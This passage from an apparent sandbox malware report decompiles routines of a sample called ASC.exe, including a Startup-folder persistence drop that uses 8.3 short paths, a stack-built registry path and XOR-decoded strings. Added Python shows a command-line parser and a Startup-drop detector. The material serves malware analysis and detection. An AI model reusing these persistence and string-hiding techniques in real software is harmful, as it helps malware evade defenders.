    																_t103 = _a8;
    															}
    															_t114 = _t114 + 1;
    															_t86 = 1;
    															_t96 = 0;
    															goto L50;
    														}
    														if(_t103 != 0) {
    															 *_t103 = 0;
    															_t103 = _t103 + 1;
    															_a8 = _t103;
    														}
    														 *_t108 =  *_t108 + 1;
    														_t94 = _a12;
    														goto L39;
    													}
    												}
    												break;
    											}
    											_t64 = _a4;
    											if(_t64 != 0) {
    												 *_t64 =  *_t64 & 0x00000000;
    											}
    											 *_t94 =  *_t94 + 1;
    											return _t64;
    											goto L82;
    											L33:
    										} while (_v8 != 0 || _t83 != 0x20 && _t83 != 9);
    										if(_t103 != 0) {
    											 *((char*)(_t103 - 1)) = 0;
    										}
    										goto L38;
    									} else {
    										_t108 = _t108 + 4;
    										goto L14;
    									}
    								}
    							}
    							goto L82;
    						}
    						E012C115B(_t91, _t102, _t113,  *0x12e3240);
    						 *0x12e3240 =  *0x12e3240 & 0x00000000;
    						 *_t108 =  *_t108 & 0x00000000;
    						 *0x12e6b20 = 1;
    						_t53 = 0;
    						goto L17;
    					}
    				} else {
    					L3:
    					_t53 = _t50 | 0xffffffff;
    					L18:
    					return _t53;
    				}
    				L82:
    			}

    Instruction addresses covered by the listing above (per-line assembly column omitted): 0x012c79fa to 0x012c7c6f

    APIs
    • _strlen.LIBCMT ref: 012C7A24
      • Part of subcall function 012C8FD6: Sleep.KERNEL32(00000000), ref: 012C8FFE
    • _strlen.LIBCMT ref: 012C7A55
      • Part of subcall function 012CB01C: x_ismbbtype_l.LIBCMT ref: 012CB02A
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true
    • Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
    • Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
    • Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
    • Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
    • Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd
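
The listing above is really two CRT routines run together by the decompiler. The first part walks the environment block, allocates with the Sleep-retry allocator (E012C8FD6) and copies every entry that does not start with '='; after the int3 that follows the call to E012C38BA the output continues into the next routine, a quote-and-backslash state machine over the command line (0x22 is '"', 0x5c is '\', 0x20 and 9 are space and tab, _v8 is the in-quote flag, _t96 the pending backslash count). The report's own API list shows the CRT's _parse_cmdline.LIBCMT being called from 012C7C70, and the branches here match that routine's documented rules. The following is an added reference implementation of those rules in Python, written for this page and taken neither from the sample nor from any runtime source; it assumes a single-byte character set (the lead-byte check via E012CB01C has no equivalent for str) and implements the branch at `_t69 = _t114 + 1`, which treats a doubled quote inside a quoted argument as one literal quote without leaving quote mode. The rules matter to a defender because any process that assembles a command line for CreateProcess is parsed by exactly this logic on the receiving side, and the trailing-backslash vector in the demo is a classic source of argument injection.

```python
def parse_cmdline(cmdline: str) -> list[str]:
    """Split a Windows command line into argv the way the MSVC CRT's parse_cmdline
    does (2008-and-later rules), for a single-byte character set.
    Added example for this report page; not code from the sample."""
    n = len(cmdline)
    p = 0
    argv: list[str] = []

    # argv[0]: the program name uses a simpler rule than the other arguments.
    # Quotes only toggle quote mode (and are dropped), backslashes are literal,
    # and the name ends at the first space/tab outside quotes or at end of string.
    arg: list[str] = []
    inquote = False
    while p < n:
        c = cmdline[p]
        if c == '"':
            inquote = not inquote
        elif not inquote and c in " \t":
            p += 1            # consume the separator, as the CRT does
            break
        else:
            arg.append(c)
        p += 1
    argv.append("".join(arg))

    # Remaining arguments:
    #   2n   backslashes followed by '"' -> n backslashes, the quote toggles quote mode
    #   2n+1 backslashes followed by '"' -> n backslashes, the quote is literal
    #   backslashes not followed by '"'  -> copied literally
    #   inside quotes, '""'              -> one literal quote, quote mode unchanged
    inquote = False
    while True:
        while p < n and cmdline[p] in " \t":
            p += 1
        if p >= n:
            break
        arg = []
        while True:
            copychar = True
            numslash = 0
            while p < n and cmdline[p] == "\\":
                p += 1
                numslash += 1
            if p < n and cmdline[p] == '"':
                if numslash % 2 == 0:
                    if inquote and p + 1 < n and cmdline[p + 1] == '"':
                        p += 1        # skip the first quote of the pair; the second is copied below
                    else:
                        copychar = False
                        inquote = not inquote
                numslash //= 2
            arg.append("\\" * numslash)
            if p >= n or (not inquote and cmdline[p] in " \t"):
                break
            if copychar:
                arg.append(cmdline[p])
            p += 1
        argv.append("".join(arg))
    return argv


if __name__ == "__main__":
    # The last vector is the trailing-backslash trap: in "C:\dir\" the final \" is a
    # literal quote, so the argument never closes and swallows whatever follows.
    for line in [r'"C:\Program Files\app.exe" /q', r'x "a""b"', r'x a\\\"b', r'x "C:\dir\"']:
        print(repr(line), "->", parse_cmdline(line))
```

The function returns the argv list without the trailing NULL entry that the CRT appends; everything else, including the empty argument produced by `""` and the single empty program name for an empty command line, follows the decompiled control flow.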

    Control-flow Graph

    C-Code - Quality: 68%
    			E012D13C5(void* __ecx, void* __edx, void* __eflags) {
    				void* __ebx;
    				void* _t4;
    				void* _t5;
    				intOrPtr _t13;
    				intOrPtr _t14;
    				intOrPtr* _t16;
    				intOrPtr _t19;
    				intOrPtr _t21;
    				intOrPtr _t30;
    				void* _t34;
    				void* _t37;
    				signed int _t38;
    				void* _t42;
    				void* _t44;
    				void* _t51;
    				void* _t69;
    				char** _t72;
    
    				_t51 = __edx;
    				_t37 = __ecx;
    				_t4 = E012D0693(); // executed
    				if(_t4 != 0) {
    					_push(_t34);
    					_push(_t34);
    					_push(_t34);
    					_push(E012CF8F4);
    					_push(_t34);
    					_push(_t34);
    					return E012EBAA1(_t4, _t34, _t37);
    				}
    				_push(_t4);
    				_t5 = E013790ED(_t34);
    				__eflags = _t5 - 4;
    				if(_t5 != 4) {
    					_t38 = 8;
    					memcpy(0x12e5914, 0x12e079c, _t38 << 2);
    					memcpy(0x12e5934, 0x12e07c0, 0 << 2);
    					_t42 = 8;
    					_t65 = 0x12e07e4;
    					memcpy(0x12e58f4, 0x12e07e4, 0 << 2);
    					_t72 = _t69 + 0x24;
    					E012CDDE1(0x12e4f18, 0x12e4f1c); // executed
    					 *_t72 = L"C:\\Users\\angela\\AppData\\Roaming\\MICROS~1\\Windows\\STARTM~1\\Programs\\Startup";
    					E012CFAC9(0, _t51, __eflags);
    					 *_t72 = L"C:\\Users\\angela\\AppData\\Roaming\\MICROS~1\\Windows\\STARTM~1\\Programs\\Startup\\ASC.exe"; // executed
    					E012D01FD(__eflags); // executed
    					 *_t72 = L"C:\\Users\\angela\\AppData\\Roaming\\MICROS~1\\Windows\\STARTM~1\\Programs\\Startup\\ASC.exe";
    					E012CFB12(0x12e4f18, _t51, 0x12e07e4 + _t42 + _t42, 0x12e07e4, __eflags);
    					_t44 = 8; // executed
    					_t13 = E012CF5AF(0x12e4f18, 0x12e07e4 + _t42 + _t42, 0x12e07e4); // executed
    					__eflags = _t13;
    					if(__eflags == 0) {
    						L10:
    						_t14 = E012D0340(_t65, __eflags);
    						__eflags = _t14;
    						if(_t14 != 0) {
    							goto L8;
    						} else {
    							_t65 = 0x1388;
    							_push(0x1388);
    							E012CD184();
    							_t19 = E012D0383(0x1388, __eflags);
    							__eflags = _t19;
    							if(_t19 == 0) {
    								goto L8;
    							} else {
    								_push(0x1388);
    								E012CD184();
    								_t21 = E012D524E(0x12e4f18);
    								__eflags = _t21;
    								if(_t21 != 0) {
    									__eflags =  *0x12e59a4; // 0x0
    									if(__eflags == 0) {
    										E012D106C(_t51, __eflags, 0x12e4f18);
    										 *_t72 = 0x7d0;
    										E012CD184();
    										E012D0BBC(0x12e4f18);
    									}
    									E01317EBD(_t65);
    									 *_t65( *0x12e59b0, 0x400, 0, 0, E012CF5EF(0x12e4f18, 0, _t65));
    									 *_t65( *0x12e59b0, 0x405, 0, 0);
    								}
    							}
    						}
    					} else {
    						_t30 = E012D02B6(0x12e4f18, __eflags);
    						__eflags = _t30;
    						if(_t30 != 0) {
    							_push(0);
    							E012D03C5(0x12e4f18, _t44, _t51, 0, 0x12e07e4);
    						}
    						L8:
    						__eflags =  *0x12e59a4; // 0x0
    						if(__eflags != 0) {
    							_t16 =  *0x12e4f14; // 0x0
    							_push(0);
    							 *_t16 = 1;
    							RtlExitUserThread();
    							goto L10;
    						}
    					}
    					__eflags = 0;
    					return 0;
    				} else {
    					_push(_t34);
    					return E0137270E(_t5, _t37);
    				}
    				goto L17;
    			}

    Instruction addresses covered by the listing above (per-line assembly column omitted): 0x012d13c5 to 0x012d151d

    APIs
      • Part of subcall function 012D0340: CloseHandle.KERNEL32(00000000), ref: 012D0377
    • RtlExitUserThread.NTDLL(00000000,00000000), ref: 012D1494
      • Part of subcall function 012CD184: CloseHandle.KERNEL32(00000000), ref: 012CD1A0
      • Part of subcall function 012D03C5: CloseHandle.KERNEL32(?), ref: 012D0452
    Strings
    • C:\Users\user\AppData\Roaming\MICROS~1\Windows\STARTM~1\Programs\Startup\ASC.exe, xrefs: 012D1446
    Memory Dump Source
    • Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true
    • Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
    • Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
    • Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
    • Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
    • Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd
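
The routine above drops the sample into the per-user Startup folder as ASC.exe (the string at xref 012D1446) and spells the path with 8.3 short names, MICROS~1 for Microsoft and STARTM~1 for "Start Menu". A detection that matches only the long form `\Microsoft\Windows\Start Menu\Programs\Startup\` therefore misses this write. The following added example, which is not part of the report and not the sandbox's own signature logic, runs a Startup-folder drop check over a constructed list of file-creation events. The events, process names, extension lists and severity labels are assumptions made for the example; only the first path mirrors the string visible in the listing.

```python
import re

# Constructed sample file-creation events (process, created path). Made up for this
# example; only the first path reproduces the string seen in the decompiled routine.
SAMPLE_EVENTS = [
    ("govrat.exe",   r"C:\Users\user\AppData\Roaming\MICROS~1\Windows\STARTM~1\Programs\Startup\ASC.exe"),
    ("explorer.exe", r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini"),
    ("setup.exe",    r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Updater.lnk"),
    ("msiexec.exe",  r"C:\Program Files\Vendor\app.exe"),
    ("govrat.exe",   r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.EXE"),
]

# Extensions Explorer runs at logon, directly or through a registered handler. The
# split into two tiers is an assumption for the example: shortcuts are routinely
# placed in Startup by legitimate installers, so they get a lower severity.
EXEC_EXTS = {".exe", ".dll", ".scr", ".com", ".pif", ".bat", ".cmd",
             ".vbs", ".js", ".jse", ".wsf", ".hta", ".ps1"}
SHORTCUT_EXTS = {".lnk"}

# Startup folder in its long form and in the 8.3 form the sample uses. The numeric
# suffix after '~' is host dependent, so any digits are accepted. Matching is
# case-insensitive because NTFS is.
STARTUP_RE = re.compile(
    r"\\(?:Microsoft|MICROS~\d+)\\Windows\\(?:Start Menu|STARTM~\d+)\\Programs\\Startup\\([^\\]+)$",
    re.IGNORECASE,
)
USER_PROFILE_RE = re.compile(r"\\Users\\[^\\]+\\AppData\\Roaming\\", re.IGNORECASE)
SHORT_NAME_RE = re.compile(r"~\d+\\")


def canonical(path: str) -> str:
    """Case-fold the path and expand the two 8.3 components so the same file written
    through either spelling dedups. Assumes MICROS~n and STARTM~n alias Microsoft and
    Start Menu, which holds on a default profile but is not guaranteed by NTFS."""
    p = re.sub(r"MICROS~\d+", "Microsoft", path, flags=re.IGNORECASE)
    p = re.sub(r"STARTM~\d+", "Start Menu", p, flags=re.IGNORECASE)
    return p.lower()


def find_startup_drops(events):
    """Return one hit per distinct executable or shortcut created in a Startup folder."""
    hits, seen = [], set()
    for process, path in events:
        m = STARTUP_RE.search(path)
        if not m:
            continue
        name = m.group(1)
        ext = name[name.rfind("."):].lower() if "." in name else ""
        if ext in EXEC_EXTS:
            severity = "high"
        elif ext in SHORTCUT_EXTS:
            severity = "medium"
        else:
            continue                       # desktop.ini and similar inert files
        key = canonical(path)
        if key in seen:
            continue
        seen.add(key)
        hits.append({
            "process": process,
            "file": name,
            "scope": "user" if USER_PROFILE_RE.search(path) else "machine",
            "short_name_path": bool(SHORT_NAME_RE.search(path)),
            "severity": severity,
            "path": path,
        })
    return hits


if __name__ == "__main__":
    for h in find_startup_drops(SAMPLE_EVENTS):
        flag = " (8.3 path)" if h["short_name_path"] else ""
        print(f'{h["severity"]:6} {h["scope"]:7} {h["process"]:12} {h["path"]}{flag}')
```

The `short_name_path` field is worth surfacing on its own: a process that writes to Startup through 8.3 component names is usually doing so to dodge string matching, which is itself a signal independent of the file type.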

    Control-flow Graph (rendered graph omitted; basic blocks span 12c1a39 to 12c1ae4, entry block 12c1a39-12c1a53)
    C-Code - Quality: 100%
    			E012C1A39(signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
    				intOrPtr _v24;
    				signed int _v28;
    				void _v32;
    				signed int _v36;
    				void* __edi;
    				signed int _t25;
    				signed int _t34;
    				void _t36;
    				void* _t39;
    				signed int _t42;
    				signed int _t44;
    
    				_v36 = _v36 & 0x00000000;
    				_t34 = 7;
    				if(_a12 != memset( &_v32, 0, _t34 << 2)) {
    					_t36 = _a8;
    					_t44 = _a4;
    					if(_t36 == 0 || _t44 != 0) {
    						_v32 = 0x7fffffff;
    						if(_t36 <= 0x7fffffff) {
    							_v32 = _t36;
    						}
    						_v24 = 0x42;
    						_v28 = _t44;
    						_v36 = _t44;
    						_t25 = E012C54D3(_t39,  &_v36, _a12, _a16, _a20); // executed
    						_t42 = _t25;
    						if(_t44 != 0) {
    							_t17 =  &_v32;
    							 *_t17 = _v32 - 1;
    							if( *_t17 < 0) {
    								E012C391C(_t39, _t42, 0,  &_v36);
    							} else {
    								 *_v36 = 0;
    							}
    							_t25 = _t42;
    						}
    					} else {
    						 *((intOrPtr*)(E012C22A2())) = 0x16;
    						_t25 = E012C390C() | 0xffffffff;
    					}
    					return _t25;
    				}
    				 *((intOrPtr*)(E012C22A2())) = 0x16;
    				return E012C390C() | 0xffffffff;
    			}

    Instruction addresses covered by the listing above (per-line assembly column omitted): 0x012c1a41 to 0x012c1ae1

    APIs
    • __output_l.LIBCMT ref: 012C1AB7
      • Part of subcall function 012C54D3: __isleadbyte_l.LIBCMT ref: 012C5866
      • Part of subcall function 012C54D3: _strlen.LIBCMT ref: 012C5A66
      • Part of subcall function 012C54D3: __aulldvrm.INT64 ref: 012C5DEA
      • Part of subcall function 012C54D3: _write_string.LIBCMT ref: 012C5F3A
      • Part of subcall function 012C54D3: _write_string.LIBCMT ref: 012C5FE1
      • Part of subcall function 012C54D3: _write_string.LIBCMT ref: 012C600F
      • Part of subcall function 012C391C: __getbuf.LIBCMT ref: 012C39BB
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true
    • Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
    • Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
    • Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
    • Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
    • Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd
    APIs
    • SendMessageW.USER32(0000004A,00000000,?), ref: 012CFA00
    • Sleep.KERNELBASE(00000000), ref: 012CFA03
    Memory Dump Source
    • Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true
    • Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
    • Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
    • Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
    • Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
    • Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd
    C-Code - Quality: 16%
    			E012C8793(void* __eax, void* __ebx, intOrPtr* __edi, intOrPtr* __esi) {
    				intOrPtr _t5;
    				intOrPtr _t6;
    				intOrPtr _t7;
    				intOrPtr* _t10;
    				intOrPtr _t15;
    
    				_t10 = __edi;
    				_t15 =  *__esi;
    				E012F624A(__ebx, __esi); // executed
    				_t5 =  *_t10(__eax,  *((intOrPtr*)(_t15 + 8))); // executed
    				 *__esi = _t5;
    				_t6 =  *_t10(__esi + 4); // executed
    				 *0x12e6b24 = _t6;
    				_t7 =  *((intOrPtr*)(_t15 + 8));
    				return _t7;
    			}

    APIs
    • RtlEncodePointer.NTDLL(00000004,?,?,?,?,?,012C8808,?,012E0BC0,0000000C,012C8834,?,?,012C2402,012C802D), ref: 012C879F
    • RtlEncodePointer.NTDLL(-00000004,?,?,?,?,012C8808,?,012E0BC0,0000000C,012C8834,?,?,012C2402,012C802D), ref: 012C87A7
    Memory Dump Source
    • Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true
    • Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
    • Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
    • Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
    • Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
    • Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd
    C-Code - Quality: 72%
    			E012C3268(void* __ebx) {
    				void* __esi;
    				void* _t3;
    				void* _t6;
    
    				_t6 = TlsGetValue( *0x12e2908);
    				_t7 = _t6;
    				if(_t6 == 0) {
    					_push( *0x12e38d8);
    					_push(__ebx); // executed
    					_t3 = L012E75C6(_t1, __ebx, _t6, _t7); // executed
    					_t6 = _t3;
    					TlsSetValue( *0x12e2908, _t6);
    				}
    				return _t6;
    			}

    APIs
    Memory Dump Source
    • Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true
    • Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
    • Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
    • Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
    • Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
    • Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd
    C-Code - Quality: 63%
    			E012CD4FA(struct HINSTANCE__* __eax, void* __ebx, short __esi) {
    				short _t58;
    				short _t59;
    				short _t60;
    				short _t61;
    				short _t62;
    				short _t63;
    				short _t64;
    				short _t65;
    				short _t66;
    				short _t67;
    				short _t69;
    				short _t70;
    				short _t71;
    				short _t78;
    				short _t80;
    				short _t81;
    				short _t82;
    				short _t84;
    				short _t85;
    				short _t86;
    				short _t88;
    				short _t90;
    				short _t91;
    				short _t93;
    				short _t94;
    				short _t95;
    				short _t98;
    				short _t99;
    				short _t100;
    				short _t101;
    				short _t103;
    				short _t104;
    				short _t105;
    				short _t106;
    				short _t109;
    				void* _t112;
    
    				GetProcAddress(__eax, ??); // executed
    				_t58 = 0x53;
    				 *((short*)(_t112 - 0x144)) = _t58;
    				_t59 = 0x4f;
    				 *((short*)(_t112 - 0x142)) = _t59;
    				_t60 = 0x46;
    				 *((short*)(_t112 - 0x140)) = _t60;
    				_t61 = 0x54;
    				 *((short*)(_t112 - 0x13e)) = _t61;
    				_t62 = 0x57;
    				 *((short*)(_t112 - 0x13c)) = _t62;
    				_t63 = 0x41;
    				 *((short*)(_t112 - 0x13a)) = _t63;
    				_t64 = 0x52;
    				 *((short*)(_t112 - 0x138)) = _t64;
    				_t65 = 0x45;
    				 *((short*)(_t112 - 0x136)) = _t65;
    				_t66 = 0x5c;
    				 *((short*)(_t112 - 0x134)) = _t66;
    				_t78 = 0x4d;
    				 *((short*)(_t112 - 0x132)) = _t78;
    				 *((short*)(_t112 - 0x130)) = __esi;
    				_t80 = 0x63;
    				 *((short*)(_t112 - 0x12e)) = _t80;
    				_t81 = 0x72;
    				 *((short*)(_t112 - 0x12c)) = _t81;
    				_t82 = 0x6f;
    				 *((short*)(_t112 - 0x12a)) = _t82;
    				_t91 = 0x73;
    				 *((short*)(_t112 - 0x128)) = _t91;
    				_t84 = 0x6f;
    				 *((short*)(_t112 - 0x126)) = _t84;
    				_t85 = 0x66;
    				 *((short*)(_t112 - 0x124)) = _t85;
    				_t86 = 0x74;
    				 *((short*)(_t112 - 0x122)) = _t86;
    				 *((short*)(_t112 - 0x120)) = _t66;
    				_t88 = 0x57;
    				 *((short*)(_t112 - 0x11e)) = _t88;
    				 *((short*)(_t112 - 0x11c)) = __esi;
    				_t90 = 0x6e;
    				 *((short*)(_t112 - 0x11a)) = _t90;
    				_t93 = 0x64;
    				 *((short*)(_t112 - 0x118)) = _t93;
    				_t94 = 0x6f;
    				 *((short*)(_t112 - 0x116)) = _t94;
    				_t95 = 0x77;
    				 *((short*)(_t112 - 0x114)) = _t95;
    				 *((short*)(_t112 - 0x112)) = _t91;
    				 *((short*)(_t112 - 0x110)) = _t66;
    				_t98 = 0x43;
    				 *((short*)(_t112 - 0x10e)) = _t98;
    				_t99 = 0x75;
    				 *((short*)(_t112 - 0x10c)) = _t99;
    				_t100 = 0x72;
    				 *((short*)(_t112 - 0x10a)) = _t100;
    				 *((short*)(_t112 - 0x108)) = _t100;
    				_t101 = 0x65;
    				 *((short*)(_t112 - 0x106)) = _t101;
    				 *((short*)(_t112 - 0x104)) = _t90;
    				_t103 = 0x74;
    				 *((short*)(_t112 - 0x102)) = _t103;
    				_t104 = 0x56;
    				 *((short*)(_t112 - 0x100)) = _t104;
    				_t105 = 0x65;
    				 *((short*)(_t112 - 0xfe)) = _t105;
    				_t106 = 0x72;
    				 *((short*)(_t112 - 0xfc)) = _t106;
    				 *((short*)(_t112 - 0xfa)) = _t91;
    				 *((short*)(_t112 - 0xf8)) = __esi;
    				_t109 = 0x6f;
    				 *((short*)(_t112 - 0xf2)) = _t66;
    				_t67 = 0x55;
    				 *((short*)(_t112 - 0xf6)) = _t109;
    				 *((short*)(_t112 - 0xf0)) = _t67;
    				 *((short*)(_t112 - 0xf4)) = _t90;
    				 *((short*)(_t112 - 0xee)) = _t90;
    				 *((short*)(_t112 - 0xec)) = __esi;
    				 *((short*)(_t112 - 0xea)) = _t90;
    				 *((short*)(_t112 - 0xe8)) = _t91;
    				_t69 = 0x74;
    				 *((short*)(_t112 - 0xe6)) = _t69;
    				_t70 = 0x61;
    				 *((short*)(_t112 - 0xe4)) = _t70;
    				_t71 = 0x6c;
    				 *((short*)(_t112 - 0xe2)) = _t71;
    				 *((short*)(_t112 - 0xe0)) = _t71;
    				 *((short*)(_t112 - 0xde)) = 0;
    				_push(_t112 - 0x2c);
    				_push( *((intOrPtr*)(_t112 - 0x28)));
    				_push(_t112 - 0x144);
    				_push(0x80000002);
    				return E013784D3(_t112 - 0x144, _t91);
    			}

    APIs
    Memory Dump Source
    • Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true
    • Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
    • Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
    • Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
    • Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
    • Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd
    C-Code - Quality: 19%
    			E012C23B5(void* __edi, void* __esi, intOrPtr _a4) {
    				void* _t3;
    				intOrPtr* _t9;
    				void* _t14;
    				void* _t19;
    				intOrPtr* _t20;
    				void* _t22;
    
    				_t22 = __esi;
    				_t19 = __edi;
    				_t25 =  *0x12e08d4;
    				if( *0x12e08d4 != 0 && E012C8900(_t25, 0x12e08d4) != 0) {
    					 *0x12e08d4(_a4);
    				}
    				E012C883E(_t19, _t22);
    				_t3 = E012C2391(0x12dc2f4, 0x12dc30c); // executed
    				_pop(_t14);
    				_t27 = _t3;
    				if(_t3 == 0) {
    					_push(_t22);
    					_push(_t19);
    					E012C8827(_t14, _t27, E012C802D); // executed
    					_t20 = 0x12dc2e4;
    					if(0x12dc2e4 >= 0x12dc2f0) {
    						L8:
    						_t31 =  *0x12e6b30;
    						if( *0x12e6b30 != 0 && E012C8900(_t31, 0x12e6b30) != 0) {
    							 *0x12e6b30(0, 2, 0);
    						}
    						return 0;
    					} else {
    						goto L5;
    					}
    					do {
    						L5:
    						_t9 =  *_t20;
    						if(_t9 != 0) {
    							 *_t9();
    						}
    						_t20 = _t20 + 4;
    					} while (_t20 < 0x12dc2f0);
    					goto L8;
    				}
    				return _t3;
    			}

    APIs
    • __initterm_e.LIBCMT ref: 012C23EB
      • Part of subcall function 012C8900: __FindPESection.LIBCMT ref: 012C895B
    Memory Dump Source
    • Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true
    • Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
    • Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
    • Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
    • Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
    • Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd
    C-Code - Quality: 57%
    			E012D1AB7(signed int __ebx, void* __edx, void* __edi, void* __ebp, char _a2, short _a4, short _a6, short _a8, short _a10, short _a12, short _a14, short _a16, signed int _a18, char _a104, char _a120) {
    				void* _t24;
    				void* _t27;
    				intOrPtr* _t33;
    				signed int _t35;
    				void* _t46;
    				intOrPtr* _t47;
    				void* _t49;
    				void* _t51;
    
    				_t46 = __edi;
    				_t45 = __edx;
    				_t35 = __ebx;
    				_pop(_t47);
    				E013514C3(_t24, __edx, _t47);
    				while(1) {
    					_t27 =  *_t47( &_a120, _t35, _t35, _t35);
    					if(_t27 == _t35) {
    						break;
    					}
    					if(_t27 == 0xffffffff) {
    						continue;
    					}
    					_push( &_a104);
    					return E0132410C( &_a104, _t45);
    				}
    				_t51 =  *0x12e59a4 - _t35; // 0x0
    				if(_t51 != 0) {
    					_t33 =  *0x12e4f14; // 0x0
    					_push(_t35);
    					 *_t33 = 1;
    					RtlExitUserThread();
    				}
    				_a16 = 0x571;
    				_a14 = 0x540;
    				_a12 = 0x52b;
    				_a10 = 0x522;
    				_a8 = 0x534;
    				_a6 = 0x536;
    				_a4 = 0x529;
    				_a2 = 0x535;
    				_a18 = _t35;
    				do {
    					 *(_t49 + 0xe + _t35 * 2) =  *(_t49 + 0xe + _t35 * 2) ^ 0x00000571;
    					_t35 = _t35 + 1;
    				} while (_t35 < 8);
    				_push(_a8);
    				_push( &_a2);
    				_a18 = 1;
    				return E01348084( &_a2, 0x571, _t46);
    			}

    APIs
    • RtlExitUserThread.NTDLL(?,?,?,?,?,?), ref: 012D1AFF
    Memory Dump Source
    • Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true
    • Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
    • Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
    • Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
    • Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
    • Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd
    C-Code - Quality: 56%
    			E012D1ACF(signed int __ebx, void* __edx, void* __edi, intOrPtr* __esi) {
    				void* _t26;
    				intOrPtr* _t31;
    				signed int _t35;
    				void* _t45;
    				intOrPtr* _t47;
    				void* _t48;
    				void* _t49;
    
    				_t47 = __esi;
    				_t46 = __edi;
    				_t45 = __edx;
    				_t35 = __ebx;
    				_push(_t49 + 0x74);
    				_push(__edi); // executed
    				_t26 = E01337B08(_t49 + 0x74, __ebx); // executed
    				while(1) {
    					_t26 =  *_t47(_t49 + 0x80, _t35, _t35, _t35);
    					__eflags = _t26 - _t35;
    					if(_t26 == _t35) {
    						break;
    					}
    					if(_t26 == 0xffffffff) {
    						continue;
    					}
    					_push(_t49 + 0x74);
    					return E0132410C(_t49 + 0x74, _t45);
    				}
    				__eflags =  *0x12e59a4 - _t35; // 0x0
    				if(__eflags != 0) {
    					_t31 =  *0x12e4f14; // 0x0
    					_push(_t35);
    					 *_t31 = 1;
    					RtlExitUserThread();
    				}
    				 *((short*)(_t49 + 0x1c)) = 0x571;
    				 *((short*)(_t49 + 0x1a)) = 0x540;
    				 *((short*)(_t49 + 0x18)) = 0x52b;
    				 *((short*)(_t49 + 0x16)) = 0x522;
